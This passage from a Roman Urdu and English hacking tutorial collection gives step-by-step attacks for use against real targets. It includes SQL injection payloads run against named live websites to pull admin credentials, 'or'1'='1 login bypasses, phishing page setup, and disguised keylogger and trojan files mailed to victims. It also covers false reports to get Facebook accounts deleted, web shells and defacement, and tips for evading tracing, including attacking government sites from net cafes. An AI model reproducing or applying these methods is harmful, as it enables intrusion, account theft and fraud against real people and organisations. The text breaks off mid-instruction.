Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 34
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Hack
Tutrial:-
Website hack karney ka tarika step 1: sb se pehle ap ko ek site chahye jis ko ap ne hack kerna he es Dork list(www.ziddu.com/download/14645453/dork.txt.html ) ko download keren or koi bi dork copy ker k google me paste ker den, us k bad kafi sites show hon gi ap check kerte jaye konsi sql valn he for example: mere pass ye site he www.abhai.org.in so ab hmare pass site he jis ko hum ne hack kerna he, ab 2 problems hen k number 1 admin login find kerna and num 2 admin login hack kerna, solution of problem no 1 admin find kerna: step 1: es tool ko download(http://downloads.ziddu.com/download/14534348/Havij1.14Free.exe.htm l/eng) ker le click here to download(http://adf.ly/18k7d )es ko extract kere apni hard disk me or install kere havj tool or run kere Open HAvj or click kere Find Admin pr or Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 35
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree nichey box me apni site ka link enter keren and click on start or ye ap ko show kr de ga
www.abhai.org.in so hmari pehli problem ka solution mil gya k admin kese find kerna h ab problem number 2 k admin panel hack kese kerna he 2 ways hen admin login hack kerne k sql method me ek havj he or 2nd sql querioes sql quesries list download keren clickhere(www.ziddu.com/download/14645965/sql.txt.html ) apne net browser me jaye or admin login open kere user name ki jgaa admin type keren password ki jgaa bi admin type keren agr access na hu tu password ki jgaa 1'or'1'='1 ye type keren so user : admin password :
1'or'1'='1 or login success thats it dosto apni hr site k admin login me ye enter kr k check ker len...:) is ka mutalik ap maray blog ma ore be read kar sakta han. Blog:mtahirzahid.blogspot.com ore mtahirzahidsu.blogspot.com Hack Tutrial:-
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 36
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
SQL INJECTION KAY ZARIYA WEBSITE HACK KARNAY Kay Liye Humain In Cheezoan Ki ZarOrat paray GiRequirements :-)1.Vulnerable Website. (Use Google to find Vulnerable Website Using Dorks)2.Firefox with Hack bar add-on.3.Fresh Mind to Understand it. Ok Lets Start Vulnerable website talash karian Mainy ya vulner able website li hy http://www.qhdsenbao.com/cp_look.php?id=42 Website kay Url Kay akhir main ' Ki Alamat lagain :http://www.qhdsenbao.com/cp_look.php?id=42' Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 37
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Or Cheack kArain Kay ya Website Vulnerable hay ya nai Agar ya Website SQL Ka Error Day To Ya HaCk Ho Sakti Hay ,,aGar ya website Not Found Ka Error Day To nai Ok Ya Website SQL Error Day Rahe Hy ,,,So is ko hack karty hanAb Hum Nay is Kay db kay Column Maloom Karnay hain .. http://www.qhdsenbao.com/cp_look.php?id=42 Order by 10 -->No Error http://www.qhdsenbao.com/cp_look.php?id=42 Order by 11--> No Error http://www.qhdsenbao.com/cp_look.php?id=42 Order by 12--> No Error http://www.qhdsenbao.com/cp_look.php?id=42 Order by 13--> No Error http://www.qhdsenbao.com/cp_look.php?id=42 Order by 14--> No Error http://www.qhdsenbao.com/cp_look.php?id=42 Order by 15--> No Error http://www.qhdsenbao.com/cp_look.php?id=42 Order by 16--> No Error http://www.qhdsenbao.com/cp_look.php?id=42 Order by 17--> No Error http://www.qhdsenbao.com/cp_look.php?id=42 Order by 18--> No Error http://www.qhdsenbao.com/cp_look.php?id=42 Order by 19--> Unknown colum Error
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 38
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
To is Website Kay 18 Columns Han ..Kiun Kay Order by 19 Par ya k Unknown colum Error Deta Hay Hack Bar Main SQL Kay Tab Par
Click Karain --> Union Select stat Columns Enter Karain Or Ok Kar dian
Amount Of
Ab Website URL Kay Akhir main -- Or Id=42 Change it to Id=-42 http://www.qhdsenbao.com/cp_look.php?id=-42 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
Or Hack bar kay zariya Execute Karain Humain Vulnerable Columns Milain gay han 2,5,7,9, Ya Vulnerable Columns Hain In SAB Columns Main Malicious code Inject kar kay Admin Details nikal Saktay Han Ok Ab Db Version Cheack Karain: http://www.qhdsenbao.com/cp_look.php?id=-42 UNION SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 39
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Ab Table Name Find karnay han Same here Vulnerable Column,2, number Ko Replace karna hy "group_concat(table_name)'' Or URL Kay Akhir main from information_schema.tables where table_schema=database()-- Example: http://www.qhdsenbao.com/cp_look.php?id=-42 UNION SELECT 1,Group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=database()--
Database() Ko Remove Kar kay wahan Table.....CX_USER Ka Charter paste Karain.... Go to Hack Bar .. SQL -->Mysql-->Mysqlchar()
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 40
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Ya Popup Samanay Ay Ga yahan Jo Table Of User..Admin Etc Yahan Par Paste karian Or Ok Kardain
Ab Website KaY URL Main Is Trah Changing Karni hay Replace "group_concat(table_name) with "group_concat(column_name)" and Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name= Yahan Jo Cx_user mysqlchar Hay Paste Karain-- Example : http://www.qhdsenbao.com/cp_look.php?id=-42 UNION SELECT1,Group_concat(Column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM information_schema.columns WHERE table_name=CHAR(99, 120, 95, 117, 115, 101, 114)--
Now replace group_concat(column_name) with group_concat(User_name,0x2a,user_pwd) OrURL KAY End main From Jo Table Hum nay nikala Tha ... Cx_User.... Like This http://www.qhdsenbao.com/cp_look.php?id=-42 UNION SELECT 1,Group_concat(user_name,0x3a,user_pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 41
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
FROM Cx_User
EnterKarain Admin Password:[b]fca7268b02d718468be4858a1506fc55 (millikuvvetler)[/b][b]
Ab
Username:
note: inurl:index.php?id= site:pak ya dork khas tor par iss country ka liya hi ha Hack Tutrial:Kis tarika sa facebook account delete kartay hain 1. Victom ka full name2. Victom ki date of birth3. Victom ki fb profile ka url address4. 1 id banayen yahoo per ya gmail per victom kr first and last name ki. Yeh sari details ap ko victom ke fb account se mil jayen gi.5.Ab is link er jaen www.facebook.com/help/contact.php?show_form=cannot_identify 6.Ab jo sari requirements thi wo is form ma fill kr dyn 7. Form ke last option main 'description of your issue' Us main ap khud victom ban ke kahen je meri yeh id kisi ne hack kr li hai main 1 regulr membr hn or new acnt bnane mn mjhe koi diqqat nhn h. Facebook team ap ki yeh application parhtw hi wo account 24-72 hours main del mar de gi. Hack Tutrial:-
Phishing page upload karnay ka tarika Step 1: download fake loginStep 2: apna ek free account bnaye kisi bhi ftp hosting service me, me ap ko http://www.110mb.com/ Suggest kerta hu yaha pe jaa ker free signup pe click kere or ek account register kere. Step 3: jab ap apna hosting account click ker le tu fake page ki 2 files php or htm files ko Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 42
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
upload ker den. Step 4: jub ap dono files upload ker len tu Facebook htm pe right click kere or us file ki link location copy ker le jessa k nichey image me dikhaya gya he or us link ko copy ker k us person ko den jis ka account ap ne hack kerna he, jab wo es fake page se login hu ga tu ek password log ki file khud hi creat hu jaye gi..:)
Enjoy it.... Hack Tutrial:-
Hacking karte waqt in par amal karna
1) I.p change ya hide krna..2) Kabi government ki sites ko mat cherna..3) Agar g0vernment sites ko cherna ha to apne pc se kbi mat cherna! Matlb net cafe se hack krna!4) Indian gov ki site chahe jahan se marzi hack kro koi tmhn kuch ni kahe ga.. Reason cyber war! 2) While hacking you've to hide your ip in order to defence. Get ip info from www.ip2location.com 3) Kuch ehm chzn jo k hacking mein bht Zada help ful hain! Dorks, Exploits ,Deface pages Shells ,Scanner 4) pc 2 securty haking www.code.box.sk www.rootshell.com www.cyberarmy.com www.search.cai.com www.xforce.iss.net www.infowar.com www.codes.ing.com 5) Learn hacking and internet security (id hacking, google hacking, wifi hacking, IP hacking, keylogging) e.t.c by Visiting mtahirzahid.blogspot.com mtahirzahidsu.blogspot.com
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 43
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree 6) For hacking turorials: 1.http://adf.ly/1Z8Yz2.http://adf.ly/1Z930 3.http://adf.ly/1ZbUi 4.http://adf.ly/1ZZXI 5. http://adf.ly/1Z8wI 7) Jis website ko hack karne he us k last me admin/login.php likho. jese facebook.com/admin/login.php Aur Username: admin Pswrd: 'or"=' ('or"=') ye posword he try it now. 8) 'or"=' ye SQLI ki basic ha web ki programing ka fault ha or yo ha 'or'1'='1 basically query run ho rahi ha ya ek true statement ha so login ho jahy ga. 9) MagicPs 1.5 Jst for Yahoo id and paswrd stealing. Dwnload it frm 4shared.com Before using it disable ur anti virus. . kiu k ye ek Trojan hai.AntiVirus isy detect krta hai as a VIRUS or delete mar daita hai..... _ye software Instal kro ye ek chota sa trojan soft hai. Sb setting kro us mai. eg apni yaho id type kro js pe wo paswrd snd kre ga. file name select kro pic exe rar koi file type select kro. Fake eror koi selectr kr k. Create mps pe click kr do. 10) Instal kro ye ek chota sa trojan soft hai. Sb setting kro us mai. eg apni yaho id type kro js pe wo paswrd snd kre ga. file name select kro pic exe rar koi file type select kro. Fake eror koi selectr kr k. Create mps pe click kr do. 11) Targets ko leke hack krna to CEH k lye b 60% chances h0te hen btw if i try 20% chances hoskte hen. Or me g00gle index query he use krta hu btw aksar scannerz use krta hu. Or hacking k lye u mst knw bout c0mplete sql injection... Wo b Manually .. site ko hack krte waqt week point h uske security or b kch wholes means weak point h0te hen 12) Guest. . Ya user acount ma cmd open kr k Type kren. Net User Administrator asdfg Enter kr den. Asd paswrd lag jai ga. Admin ka paswrd. . Ya Run mai type kren. Lusrmgr.msc or yhan se paswrd set kren. . 13) I.p Matlb Internet protoc0l.. Har Internet connection ka i.p hota ha jis se ap ki p0siti0n ko trace kia ja skta ha! Wo kuch is tarhan k h0te hain 192.168.1.1 etc 14) Jo web vub gi usi ma login ho ga / chracter use karny say ya vub khatam ho jata ha or hr web ma admin bi ni hota. 15) Site hack kr k har hacker Miror ki boht si sites hain un mai ksi pe b hckd site ka miror dy dta hai. . . Yhan har hckr ka sara record hota hai. . Mai ne jhan ki ranking btai wo Mirror.sec-t.net web hai. . . 16) Free Program For Hack Password: http://www.mediafire.com/?dncqqjpe3r5pz3s Its 100% Working 17) One of best software 4 cracking is ws32dsm if u want 2 learn cracking then visit astatalk.com 18) Sony: Hacker stole PlayStation users' personal info http://on.cnn.com/gxgr7k 19) Hacking Tip: Hacking ke liye aik software use hota hai us software ka naam hai "magicps.1.5" search Link: www.4shared.com 20) For hacking a web u will need. 1. sql helper v 2.7 Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 44
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree 2. exploit scanner 3. Havij for admin finder and Md5 4. Dorks 21) There R 5 Methods of Hacking Email IDs: Fake Login PagesCookie StealingSocial EngineeringBrute ForcingTrojans or Keyloggers. And Once More u can ask the paswrd frm the ownr of that id! 22) Email Hacking by Software: Email Hacking k liye ek Software use hoti hai jo Internet se purchase karni hoti hai. Is mein zyada tar fraud hota hai. Aksar Softwares work karti hain aur aksar nahi. 23) Email Hcking by Cracking: Is k lie b ek Software use hoti ha.Is Software me Victim ki Id rkhni hoti ha or kuch Paswrds hote hn.Id r Paswrd is Software me rkh kr Crack krni hoti hn.Ye method thora mushkil hota ha jiski wja se aksr Hackrz is Software se Hack ni kr skte 24) Email Hacking by Fake Pages: Ye ek page hota hai jo kisi victim ko dhoka dene k liye banaya jata hai ya bana banaya Download kya jata hai. Ye sub se easy method hai Email Hacking ka 25) *Hacking* 1.Arbitary File Deletion 2.Code Execution. 3.Cookie Manipulation 4.CRLF Injection 5.Cross Frame Scripting (XFS) 6.Cross Site Scripting (xss) 7.Directory Traversal 8.Email Injection. 9.File inclusion. 10.Full path Disclosure. 11.LDAP injection. 12.PHP code Injection 13.Remote XsL inclusion. 14.SSI injection 15.SQL injection 16.URL Redirection 17.xPath Injection. 18.CSRF 19.LFI 20.RFI 26) Common Web Hacking Methods. 1. Cross Site Scripting (xss) 2. Cross Site Request Forgery (CSRF)3. Click jacking4. Gifar 5.Url Fram injection 6. SQL injection 7. Local file Inclusion (LFI)8. Remote file inclusion (RFI) 27) Hacking ki kuch terms use h0ti hain! Jaise:"N0obs" matlb k begineer hai.. Jo bunda abi begineer ho new new hacking sekh raha ho..2) "Vulnubrle" matlb jo site hack ho ske.. 28) Hacking meth0ds Ye Hain:XSS DNN RFI LFI SQL INJECTI0N IIS ROOTING BYPASS L0GIN Rooting ki agey bohat types 29) How To Hack A Yahoo Messenger's Password ? There A Lot Of Ways 1:with Mps Jo Easy hai.2:with Keylogger ,sa App Facebook,Msn etc b hack kar sakta ho.3: fake page Hai isi sa app B yahoo,facebook,msn etc hack kar sakta ho lakin sub k Fake page different hai 30) > Ye nishan jhan hai whan just enter pres krna hai ye type na kr dna > 4. . 5 lines hain. Words daikh lo case sensitive hai. Jese whan likhe hn same usi tara capital smal leter use krne hn. . 31) AGR Ap kisi ka B(Facebok,yaho)Acount Hack krna Chahty ha To Downlod This Software"LOGIN SPOOFER"Make Fake Pages & Hack 0ther's Account 32) P1 Keylogger na to koi Software hota ha or na hi koi Virus.Balke ye Tool hota ha jis se ap apna Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 45
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Virus bnate hn.Ye Virus ap Victim ko bhejte hn.Is pr Click krty hi ye Victim k press hone wale Keys ko save kr k ap tk puhunchata ha. Ardamax Keylogger sb se best ha.Is me ap Victim k Screen Shots b hasil kr skte hn.Keylogger se Virus bnate huwe apko kisi Web Hosting ka Username or Password dena ha,Jahan pr apke Victim k Passwords save hote jaenge.Byethost.com best ha Keylogging k liye.Yahan apna Account bnaen or Vista Panel me login ho jaen.Samne right side pr apka Ftp Username show ho rha hoga.Ye Ardamax me Virus bnate huwe Copy Paste kr den 33) Aap Tutorial, Video aur Ardamax yahan se Download kar sakte hain: http://tinyurl.com/h4ckerkey Ardamax mein Hosting ki details dene k baad Ok karen. Virus Ready. Ab is ko Crypter mein daal kar (Ye Keylogger k saath download karen) Virus ka Icon change kar k koi Image bana len, taake Victim ko shak na ho. Aur jab Victim is par Click kar k Open karega to uska Pc gaya.... -----EnD----34) keylogger Software se Yaho Facebook Msn Hotmail gmail Sb idz hack ki ja skti hain. . Keyloger boht se hain. Ardamax keyloger Perfect keyloger Stealth keyloger Silent keyloger Etc. . Sb k use krne ka method same hai. Ak Trojan file create krte hn. Usy koi b icon dy kr ksi b extention (.dat .avi .jgp .exe) mai cnvrt kr k us file ko mail kr diya jata hai js ki id hck krni ho. Agr wo bnda wo file pic, open kr le.To wo keybord ki jo b key pres kre ga wo ap ko mail mai mile ga. Us k sb pwd mil jain ge. Us k pc ki screen print. Pics b 35) Keylogger : Keylogger Ek Software Hai Jo mtahirzahidsu.blogspot.com Mai B Hai Ya Google sa Find karo Isi download karo Our Ek Torjan File Banao Our Isi File Ko send karo isi O Jitna b Keys press kara gay Keyboard k O sub save ho kar app k email kar day gay... Next hai fake page. 36) Fake page se hacking karne ko phising kehte hain 37) today i will sharing how to make fakepage of any web so first of all open web i.e facebook.com then right cick n go 2 option view source or open source depend upon ur browser nw u hv a html script nw select all (ctrl+a)then copy it (ctrl+c) then open a notepad and past(ctrl+v) it there n save(ctrl+s) it as index.html nw in notepad find (ctrl+f) and action nw u will get an address in "" just remove that address and past pass.php download a little php script 4rm tinyurl.com/fakephp open it in notepad u will find web address change it 2 redirect web i.e facebook.com Now upload these files 2 free hosting web like 110mb.com, 00abiz.com, my-php.net ect there in ftp u will find a folder go in it then there there u will find index.html replace it 2 ur files u cn also upload more fake pages by creating new direction i.e facebook, yahoo *end* 38) YAHOO ID password and ID stealing k liye MagicPs 1.5 Ya MPS ++ Down load kren. Its a trojan use it at ur own risk. 39) Create mps se wo ek file create kre ga js ko ap ne zip, rar mai rakh k us id pe mail krna hai js ki id hck krni hai. Agr wo usy open kr leta hai. Pictr smj k to us ki id, paswrd tmari id pe recive ho jai gi by mail 40) guys jo bhe newbie hacker hen they must learn xss tunneling 41) acuntex scanner download kren,wo batadeta ha k site ks method se h4ck hoskti ha Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 46
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree 42) Change the default location 4 installing programs go 2 run n type regedit hkey_local_machine?/software?/microsoft?/windows?/currentversion nw in right site find c:?/program files change it 43) Refrl wali site me apne target ka email qabo kro phr usky mail me Fake page ka link send kr k uska email aur pasword hasil kro 44) Keyloger ki setting kr k by email victim ko bhejo 45) Linux ki ek ek site alag alag deface krni hoti ha 46) Ab HaCkiNg SekhiUrdu Main , Free HaCking SofTwAre DownLoAd KarEn, HaCkiNg SoftWaRe Kexe Use Hote Hain, SaFety TiPs , HaCking RulEs , HaCkiNg HeLpFul LiNks Or Bhi BuHuT KuCh JaniYe HaCkiNg Ke Bare MaiN Wo Bhi SuB Urdu Main Visit Karen mtahirzahid.blogspot.com 47) Download Prorat. After its downloading, Right Click on the Folder and choose Drive to extract. Now we will create the actual Trojan file. Click on Create and choose Create Prorat Server. Now enter your Ip Address so that Server could Connect to you. If u dont know your Ip Address, Click on little arrow to have it filled automatically. Now put your Email so that when a Victim gets infected, it will send u a Message. We will not be using the rest of the Options. 48) ye info galat h.K linux ke ek ek site alag alag deface karne hoti hyn.Ap server root kar k sb site ko script ya to0l se mass deface kartae ho 49) Server Hacking k liye ek Software bhi use hotay hain. Ye ek normal file (mp3, pic) ko ek Hacking file mein convert kar deti hai. Jab is file ki setting us Software k through mukammal ho jati hai to usy kisi Victim ko send karna hota hai. Jab wo User us file ko open karta hai to us ki Information aapki Id par mail hoti hain.
50) Facebook Password Hack karne k liye Emissary Keylogger use karen. search from http://www.google.com or 4shared.com Ye victim k pc ki screen shots le kar aapki mail id par send karta hai. Is k liye aap k paas Microsoft FrameWork.net Software install hona chahiye. Download from: Www.microsoft.com/net/ 51) For Msn Hacking Download (Hotmailhack Faqs v1.0) Our Windows Hacking. (Win hacker 2.03) download karo.our (Win Secure) 52) 'server hacking' these are called binderz. . . . . Massive arc kafi acha ha. 53) Yahoo Hacking K Laha Download(Trojan Maker)r(Mps)(Bus Hack) r (Deep Throat Trojan).Or Net Hacking K Laha (Download Net Hack 3.4.2) 54) yahoo hacking tip yah00 id hack krni h t0 dwnlod"MagicPS"open kr0 j0 disable tskmngr,regedit,cmd send ip yah00 paswd etc k0 select kren phr ic0n jpg wala aur nam mn lagend.jpg lekh k creat mps pe clck krn phr j0 file bane ki zip f0ldr m dal k us ki id pe phank den (next) create mps se phla id mn apne apni id lekhni h jis pe tr0jan apk0 Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 47
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree paswd mail kr dy ga.. .k0i binder le k s soomro.jpg k0 ksi(next) aur file se bind kr k zip mn dalny se antivirus tr0jan(tahir.jpg) k0 na pakr saky ga. *End* 55) yahoo id ka pasword hack karne k liye cookies section ka itamal kia jata hy. Esliye cookies ko wash kr dia krein hack nhe hogi id 56) Yahoo id ko hack krny k liye fake page r logger k ilawa ye method use hoty hn c00kie stealing...cracking+ pass reset exploit tha jo ab work nhn krta 57) Email hacking k lye ap ko victim ki id or password pata hoto aram se hack ho jati he. The art of hacking book ka zariya sa 58) There are these methods of Email Hacking. . .1- Fake Login Pages2- Cookie Stealing 3- Social Engeenering4- Brute Forcing5- Trojan (Rat= Remote Administration Tools) 6- Keyloggers & Cracking We will use Fake Page for Email Hacking. . . This is a Page which is made for Victim or downloaded. . . Q- How to use fake page? . . . Ans- This is a page. .This page is sent to victim. When user opens this page link,His information and password etc is sent to ur Hosting account 59) When u download fake page, You will have to upload this on any Hosting account . . . Now u have to send this link to victim's Id . . Whenever victim opens this link, His/Her info & password will be in ur Hosting account 60) Email any id by using Ardramax Keylogger. 61) T0pic: H0w 2 use ur own's pc or ur 4nds pc 4nd anywhere! First of all open this site www.secure.logmein.com and make a acount and sign in.. After signing there is opti0n 2 "Add This Computer".. Click on this.. After that signout.. N0w if u wanna use ur pc 4m anywhere.. The cnditi0n is this that ur pc should b on.. N0w sign in 2 ur logmein acount 4m anywhere use ur pc if ur pc is on.... Similarly u can try the same trick wd ur 4nd's pc.. Just use ur 4nds pc and sign in 2 ur logmein's acount and add ur 4nds pc too And use ur 4nds pc 4m anywhere requiring 1 c0nditi0n that the pc is on. U can add 5 pc 4m 1 acount... END.. 62) How To Hack Ur Friends Computer Using Website ? 1st Open Www.Logmein.com And Make A Account And After That Sign In Ho kar Sign Ho jaho ! Per Apna Dost Ya Net Cafe Jay k visit Www.Logmein.com Again and Open Ur Account And Click On Add This Computer And Add that Computer ok app 5 Computer Add kar sakta ho Our Per Apna Computer Open kar K Per Sa Apna Account open karo Our Jab app k dost Online Ho jaha isi k Computer Show Ho jaha gay k online ha and Use it.. Enjoy 63) Jin .php .asp webs mai Sql eror paya jata hai unhe sql injection se hack keya jata hai ye without soft tools hack ho skti hain par asaani k lye eror webs finding k lye Havij software use keya jata hai. 64) Online Sql Injection Tools: Killer.blackapplehost.com Revtan.site40.net Kerinci.net Kinginfect.net 65) Some Sql Injection Methods: Time base sqli Sqli by finding valid columns Blind folded sqli Sqli by load file injection 66) Aap Scanners se Sql Site Hack karne k liye Vulnerabilities find kar sakte hain. In mein Exploit aur Accunetix Scanner shamil hain. Accunetix har kism ki Vulnerability find karta Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 48
Power Of HackingÂŽ Facebook:https://www.facebook.com/HAckingRouterwifiFree hai agar register ho, warna just Xss find karega. You can download from: Www.Accunetix.co/websitesecurity/sqlinjection 67) HACKING CLASS NO. "1" 1- SQL INJECTION HACKING Sab se Pehle Ap Www.Google.Com Open Karen Search Bar Mein Likhen Inurl:adminlogin.asp Jo Web Results Ayen ge Us Mein Se Jis Web k Admin Page Pe Ap Login Hona Chahte Hen Usko Open Karen Username 1'or'1'='1 Password 1'or'1='1 Likh K Login Ho Jayen Ab Ap Admin Panel Mein Enter Ho Jayen ge Is Method Ko Test Karne k Liye Ye Link Visit Karen mtahirzahid.blogspot.com 68) SQLI se admin page me name and password k bd login ho gae phr web me editing ks terhan krte hen.C next 69) wo admin ki permision par ha, agar admin privilige ziada hen to tm full edit krskte ho.. Web ka c0ntent knsa ha? J00mla, wp,mgento, ya kch or? 70) Sql injection is a web hacking method. We use some dorks in this method. Like: inurl:id=5 Search this in Google. Then open any web. The web will be something like this:Www.Site.com/index.php?id=5 Then we will check that it is vulnerable (Hackable) or not. We will put ' after 5. Like: Www.site.com/index.php?id=5' If you get an syntax error, then it is vulnerable Now, we will find its valid columns. Put: index.php?id=5 order by 1-Keep checking untill u get an error. If you get an error in 6, then it has 5 columns. Now: index.php?id=-5 union all select 1,2,3,4,5-You will get valid column. Suppose that 4th is valid. Now find version of database. index.php?id=5 union all select 1,2,3,@@version,5â&#x20AC;&#x201D; If version is 5,u can directly find table's names.Bt if version is 4,u'll have to guess table's names. Suppose if verson is 5.1.23 (5),then find tables like this: index.php?id=5 union all select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema=database()-You will get table's name. Now find columns: index.php?id=5 union all select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=char() Now final step. Find admin id, username and pass. index.php?id=5 union all select 1,2,3,group_concat(username,0x3a,pass) from admins-****Finish**** 71) H0w to hack website? H0w to be a g0od hacker? Bhot se methods hen website hacking k. But m0st p0pular ix SQL injection, xss-c00kie Shelling a site via sqli...jesy koi bhe site hack ki via sqli to hmare pas admin passwrd h0ga, to us s l0gin hojayen. Then try to find the option having names, Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 49
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree 72) Some Questions about shells and Hacking softwares: Yar rootes aur shell kia hota hai. Ap ip hide kelye konsi web ya sofware use krty hain. Apka favorite haking tool konsa hai. Target sites ko hak krny ka best method konsa hai. Aur ap google index query use krty hain ya target site pr he attack krty hain. Haking kelye Sql Ka knowledge zarori hai ya kam chal jai ga. Site ko hak krty waqat ap uska konsa weak point search krty hain. shell basically hm web ka control use krne k lie use krte han,ye ziada tr php nd asp format me hote han Dnn krte wqt aapko shll ko jpg me cnvrt krna prta ha,ise shell pe koi asr ni hota in short shell ak Php ya asp script hai jse ham web mai upload kr dty hain. . Or wo hamy web pe control dta hai. Us shell k zariye ham apna deface page upload krte hn, , C99.php r59.php shell php coding se notepad me hi banta ha,bt hm bane banae use krte han,shell ksi site pe upload krne se hamarey paas site ka full control ajata ha,phr hm us pe deface page uploadkrskte han, shells bht saarey hote han,common c99 or r57 ha,shells hm dnn rfi me commonly use krte han, Q.Shell upload website k kis hisy ma hoty hn? Ek Example Ha Gogle Ma Ap Likho C99.php Pr search kro Same to Same Shell ha Isi Open kr k Dakho shells websites par upl0ad krne k bad web par full access milti ha shells bh0t se languages me mil skte hen. Php,asp,aspx,perl,cgi,jsp me ye smjho bad programing language use ki jati ha isme. u can get free shells 4rm these sites. Sdf.lonestar.org cyberspace.org Grex.org Nxy.net Shellyeah.org Hobbiton.org Freeshells.net Ductape.net Free.net.pl .xox.pl Iprotection.com Coronus.com Odd.org Marmoset.net Flame.org Freeshells.net.pk Linuxshell.org Takiweb.com Rootshell.be websites of shell Getshell.Com shell4u.Com hacktools.Com u can get free shells 4rm these sites. Sdf.lonestar.org cyberspace.org Grex.org Nxy.net Shellyeah.org Hobbiton.org Freeshells.net Ductape.net Free.net.pl .xox.pl Iprotection.com Coronus.com Odd.org Marmoset.net Flame.org Freeshells.net.pk Linuxshell.org Takiweb.com Rootshell.be 73) I m g0ing 2 give u l3ctur3 on fb acount hacking thr0ugh fake pages.. This is a d3tailed l3cture wd headingss and Questi0ns! C Next! Ab atey hai is fake page ki construction ki taraf.. Constructi0n: Facebook Fake page d0wnload kro g00gle se.. Easily mil jaye ga.. Phr is fake page ko upload kro.. Ab questi0n ye h0ta ha k upload kahan kren? Answ3r: Kisi b free webhosting site 4xample 000a.biz 110mb.com IN MEin acnt bnao.. Aur ftp server mein jao.. Wahan par index name ki file h0 gi.. c Next Us index file ko replace kro apne fake page se.L0 gi apka fake page h0 gya tyar N0w questi0n Arise k Ab Isko use kaise krna ha.?? H0w 2 use Fb Fake Page! JB ap free h0sting mein apni site bnao ge.. To jo site link ho ga wo apne victim ko send krna ha.. Agar wo fake page se waqif na hua to wo us mein l0gin kre ga aur uska id and pass ap k pass aa jaye ga.. Victim: Jis ka acount hack krna ha.. N0w questi0n arise k hamein wo pass and i.d kahan se mile ga! C next..! Fr0m where u will get the victims paswrd and id?? ANSWER:Jahan per ap fb fake page rakho ge agar victim ne l0gin kia ho to wahan par Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 50
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree pass.txt k name se file buni ho gi.. Usmein victim ka id and paswrd ho ga... .....THE END...... 74) Fb ki acount hacking thr0ugh fake page h0 skti ha..! Introducti0n: Is fake page k zarye hum fb ka acount hack kr skte.. Ye same 2 same facebook l0gin jaisa page h0ga.. Aur kisi ko shak b ni ho ga.. C Next..... 75) How 2 hack fb fanpage 1st of all download fb exploit 4rm tinyurl.com/5vp9lno then edit it get notepad++ u cn d.l it 4rm notepad-plus-plus.org/download open the file name pagehack.js with notepad++ n find wamiqali@hungry-hackers.com by ctrl+f and replace it with ur own email id which hv Fb account nw u hv 2 change the viral text which will be send 2 the friends of victum 2 do this find the text hey see what i got! and replace it with ur own text. this text will sent 2 the fb wall of 15 friends of victum it is autoposting bot to prevent fb from blocking now u have to upload this script to your server 4 this make ur account on 0fess.net nw after uploading ur script ur 